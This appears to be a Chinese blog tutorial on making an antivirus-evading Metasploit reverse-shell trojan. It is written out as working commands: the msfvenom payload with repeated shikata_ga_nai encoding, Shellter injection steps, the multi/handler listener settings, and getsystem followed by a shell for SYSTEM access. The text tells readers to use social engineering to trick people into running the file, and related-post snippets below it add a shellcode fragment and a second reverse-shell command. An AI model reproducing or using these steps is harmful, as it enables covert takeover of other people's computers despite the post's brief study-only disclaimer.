msf反弹木马之免杀

最新推荐文章于 2024-05-13 12:47:53 发布
最新推荐文章于 2024-05-13 12:47:53 发布
阅读量2.2k 收藏 35
点赞数 10
分类专栏: 安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/satasun/article/details/105441604
版权

原理

利用msf模块中的msfvenom模块,首先生成.exe木马文件,用靶机打开,攻击成功后,就渗透到了靶机系统中。

准备

win7靶机 ip :192.168.56.130
kali攻击机 ip: 192.168.56.135

##实战开始
1.打开kali机,在命令行输入:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.135 lport=1234 -e x86/shikata_ga_nai -i 5 -f exe >/home/kali/Desktop/1.exe

LHOST是主机的ip,用来“提醒”木马成功后应该返回信息给自己的主机。
lport是返回时连接的端口号,需要开启tcp功能,1234端口好像默认开启?
> 后面的那一串表示木马生成的对应地址,为了方便操作我直接生成在桌面上。
-e x86/shikata_ga_nai 为使用shikata_ga_nai的编码方式对攻击载荷进行重新编码
-i 5为使用刚才设定的编码方式对目标进行5次编码

2.命令行输入

shellter

第一个选项选择Aimage.png

3.PE Target 后面填写/home/kali/Desktop/1.exe,即木马所在路径。
然后等待一段时间······
image.png
注意,虽然看着不动,但是上面那个数字一直在跳,所以不是你卡住了~

4.然后选择Yimage.png

5.选择L,payload index 选择1image.png

6.设置LHOST以及LPORTimage.png

等个大概2秒钟,就结束了~
免杀木马制作完成。
命令行输入

msfconsole

进入metasploit。
然后输入

use exploit/multi/handler

开启监听模式
接下来就是设置参数了,可以使用option命令来查看需要设置的参数。主要设置三个:payload、LHOST、LPORT,需要跟木马一样,复制一下就行

set payload windows/meterpreter/reverse_tcp
set lhost 192.168.56.135
set lport 1234

这里大小写随意,都可以被识别。
随后输入

exploit

执行监听命令,也就是攻击开始~

kali端操作结束!

然后利用社会工程学等方式诱骗其他人点击这玩意,就被攻击了。

现在假装win7被骗了,无意中点了我的反弹木马:
image.png

然后输入

shell

就可以获取对方管理员权限。
在输入shell之前,输入getsystem,获得system权限以后,再输入shell就可以获得最高权限啦~
image.png
使用echo %username%可以输出使用者的名字,这里是SJX-PC$,如果是管理员的话,只会显示管理员账号(我这里是“sjx”),而且,看前面的内容也可以知道是system权限:image.png

本篇文章仅供学习使用,读者请勿随意对他人电脑进行操作。

imbia
关注
  • 10
    点赞
  • 35
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
反弹木马工具
07-31
反弹木马,渗透神器,用作网络攻防练习使用,建议放入虚拟机安装
免杀马学习(MSF Evasion)
红队是青春
02-05 449
免杀马学习,MSF Evasion模块
为什么学网络安全技术,还要先签个免责声明?这么不相信“我”吗(1)
最新发布
2401_84545747的博客
05-13 991
很多人觉得报班就是浪费钱财,觉得自己自学就很好了,但其实自学也是需要一定的天赋和理解能力,且自学的周期较长,一些急躁的学习者或者急于找到工作的学习者,还是报班学的比较轻松,学习周期不长,学到的东西也不会少,建议学习者根据自己的自身条件选择是否报班。当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。它之所以吸引人,主要是因为它代码的可读性、语法清晰和简单,以及大量库的可用性。
免杀马学习(MSF Shellter)
红队是青春
02-05 228
免杀马学习 MSF Shellter
免杀马学习(MSF二进制混淆加密)
红队是青春
02-01 425
2022年笔记,刚入行前免杀马的学习
MSF(2)——各种木马的生成及简单的免杀
realmels的博客
06-11 3999
这里是各种木马的生成示例 在实际渗透过程中根据需求生成这里主要是php的免杀和Python的免杀,原理都是自定义加密及解密可参考前文 https://blog.csdn.net/realmels/article/details/119280877重点来了使用上文方法生成的木马,所有的木马都会报毒D盾扫描结果 火绒扫描结果 而对于exe的免杀比较复杂(主要我不会),所以在这里介绍一种简单的免杀方法。我们可以先生成一个Python的msf马,然后利用Python技术,对该木马进行免杀,最后将该木马打包成可
项目管理利刃之MSF
03-03
火龙果软件工程技术中心 MSF,MicrosoftSolutionFramework,微软解决方案框架是一个在预算范围内按期创建一个业务解决方案需要一种经过检验的方法。本文将结合MSF在项目管理中的实际应用进行讲解,如果您是软件项目...
通过Python实现Payload分离免杀过程详解
01-19
msf生成shellcode代码: 将payload给copy下来,去除引号。 \x2f\x4f\x69\x43\x41\x41\x41\x41\x59\x49\x6e\x6c\x4d\x63\x42 \x6b\x69\x31\x41\x77\x69\x31\x49\x4d\x69\x31\x49\x55\x69\x33 \x49\x6f\x44\x37\x64\...
iis 6.0 CVE-2017-7269 Msf 反弹shell
01-23
iis 6.0 CVE-2017-7269 Msf 反弹shell metasploit漏洞测试利用模块
捆绑机免杀无后门无木马
11-22
在IT行业中,"捆绑机免杀无后门无木马"是一个相对敏感的话题,因为这涉及到软件的安全性和合法性。捆绑机通常是指一种工具,能够将多个程序或恶意代码捆绑在一起,形成一个复合软件包,用户在下载安装时可能并未察觉...
简单的Msf木马免杀
weixin_47948655的博客
08-12 1064
简单加密shellcode与加载器实现msf木马免杀
反弹木马(改进版,含全部代码)
02-23
反弹木马的改进版,功能进一步加强!!!
MSFconsole进阶】evasion(免杀模块):免杀模块使用方法,相关设置
05-24 1576
【渗透工具】MSFconsole进阶:evasion(免杀模块)
使用反弹木马进行提权
forget_mt的博客
11-24 4183
渗透机:kail ip:172.16.5.6 靶 机:linux ip:172.16.5.7 客户端:windows XP ip: 172.16.5.128 通过Nikto对服务器80端口进行扫描: nikto-hosthttp://172.16.1.200 发现了login.php文件与phpmyadmin/目录 所以直接在浏览器中访问login.php sqlmap -u “http://172.16.5.7/login.php” --forms --level 3 -...
反弹木马原理_Metasploit -- 木马生成原理和方法
weixin_39986027的博客
12-22 1095
以前的人,要疯要癫要崩溃,都特别戏剧化,比如披头散发,涕泗横流,瞠目结舌等等。现在的人不会,他就静静地坐在那里,面无表情,不声不响,看着很正常,但禁不起触碰。你上前轻轻碰一下,问一句,他就垮了,就崩溃了。。。---- 网易云热评一、生成方式:利用msf模块中的msfvenom模块二、原理:msfvenom是msfpayload、msfencode的结合体,利用msfvenom生成木马程序,并在目标...
反弹shell木马免杀python版
游魂的博客
12-10 1166
反弹shell木马免杀python版 本人自己写的反弹shell工具,技术有限,目前只能反弹一个shell,还没深入研究,不过提权过程中一个shell足够了,毕竟不是远控管理工具。 最新版本的,确实是免杀的。 话不多说,看操作: 第一步打开服务端本地运行server.exe程序。 不修改端口的话回车即可。 端口已经在监听了,等待shell连接。 第二步将反弹shell木马传到网站上运行,c...
什么是木马反弹木马
ciahi的专栏
09-02 5068
什么是木马?特洛伊木马(以下简称木马),英文叫做“  Trojan house”  ,其名称取自希腊神话的特洛伊木马记。 它是一种基于远程控制的黑客工具,具有隐蔽性和非授权性的特点。 所谓隐蔽性是指木马的设计者为了防止木马被发现,会采用多种手段隐藏木马,这样服务端即使发现感染了木马,由于不能确定其具体位置,往往只能望“  马”  兴叹。 所谓非授权性是指一旦控制端与服务端连接后,控制端将享有服
生成木马反弹和简单的Windows提权
BRMTSW的博客
03-01 625
生成木马反弹和简单的Windows提权
2018-2019-2 20165314『网络对抗技术』Final:反弹木马的剖析与防御
weixin_30693683的博客
05-21 342
2018-2019-2 20165314『网络对抗技术』Final:反弹木马的剖析与防御 实践规划 通过自学,掌握木马的攻击原理,初步实现一个反弹木马,主要分为服务器端(靶机)、客户端(攻击者)和一个代理服务器端,其中客户端包括控制程序和配置程序两部分,代理服务器端提供转发数据功能以防止反跟踪。 我要开始赶鸭子上架了 初步规划做一个针对windows的远程控制型第六代木马,利用网页脚本植入,不采用...
msf反弹shell
07-28
回答: 反弹shell是一种利用Metasploit Framework (MSF)进行攻击的技术。它的原理是在目标主机上执行一个经过精心构造的客户端,使目标主机主动连接攻击者的机器的某个端口。使用MSF进行反弹shell的过程如下:首先使用msfvenom模块生成一个被控端的客户端文件,具体命令如下:msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=xxx.xxx.xxx.xxx(攻击机IP) lport=xxxx(监听端口)-f exe -o xx.exe。然后将生成的被控端文件放到目标主机内,并在目标主机内执行。此时,攻击者的机器就可以收到目标主机的session,在MSF中使用sessions命令即可查看当前收到的session,并使用session 1命令获取第一个session的会话,然后使用meterpreter模块中的shell命令即可实现反弹shell。\[1\] #### 引用[.reference_title] - *1* *3* [使用msf进行反弹shell+内网渗透](https://blog.csdn.net/JSMaster01/article/details/85402292)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [msf反弹shell](https://blog.csdn.net/weixin_34179762/article/details/93196297)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值